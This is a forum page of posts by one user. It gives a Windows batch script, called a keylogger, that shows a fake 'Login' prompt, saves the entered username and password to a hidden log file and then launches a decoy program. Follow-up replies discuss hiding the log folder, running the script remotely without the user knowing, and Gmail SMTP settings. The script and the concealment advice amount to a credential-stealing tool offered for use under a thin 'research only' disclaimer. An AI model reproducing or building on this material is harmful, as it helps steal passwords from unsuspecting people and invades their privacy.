User Controls

Thanked Posts by Hewfil1

  1. Hewfil1 Houston
    The following is to be used for research purposes only, and I take no responsibility for anything done with malicious intent.

    Alright, we're just going to use Notepad to make a simple .bat (Batch) file, keylogger.

    Start by opening Notepad, then pasting in the following code:

    @echo off
    color a
    title Login
    cls
    echo Please Enter Email Adress And Password
    echo.
    echo.
    cd "C:\Logs"
    set /p user=Username:
    set /p pass=Password:
    echo Username="%user%" Password="%pass%" >> Log.txt
    start >>Program Here<<
    exit

    Make a folder on your desktop called "Logs". It must be logs or it will not work.

    Drag that folder into C:\

    Now run a test of your "Logger.bat".

    Once tested, go back to the "Logs" folder in C:\ and there will be a .txt file. If a second entry is made, the .txt will overwrite itself.

    Enjoy!
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. Hewfil1 Houston
    I think it should be if you get the server and SMTP port right. For google it's:

    smtp.gmail.com
    Port: 587

    Dunno' about other services.
    Alright, cool. If I want to change it and ever have an issue. I'll come to y'all for help.
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. Hewfil1 Houston
    Forgot to mention that you need to run pyhton pip.exe install pillow to get the module installed that you need. Added it to my original post for clarification.


    Erm, send it in the .rar? It'd make it easier. I'm really baked and need as much help as possible. XD
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. Hewfil1 Houston
    Very nifty little trick. How much does the program interfere as the user goes about their buisness? Or more concisely how much effort would an unsuspecting user need to put into noticing the program to find it? let's assume the logs file has been moved to a deep system folder rather than the desktop to circumvent that issue.


    It doesn't stay on the desktop. That folder gets moved to a system folder. SO unless they check it, they would have no clue, BUT the .bat would need to be executed remotely without their knowledge to allow the logging to start.
    *Recheck my post. The folder gets drug into the C:\*
    The following users say it would be alright if the author of this post didn't die in a fire!
  5. Hewfil1 Houston
    why not just use keepass x or something?

    Because I don't want to. I like the keylogger because it requires an effort on my part.
    The following users say it would be alright if the author of this post didn't die in a fire!
  6. Hewfil1 Houston
    If you change the word after C:in line 8 to something different, can you name the folder on your desktop that same name?

    forgive the dumb question, I suck at computers.

    You could try. I haven't done it considering I only use mine for saving passwords because I have to change them constantly.
    The following users say it would be alright if the author of this post didn't die in a fire!
Jump to Top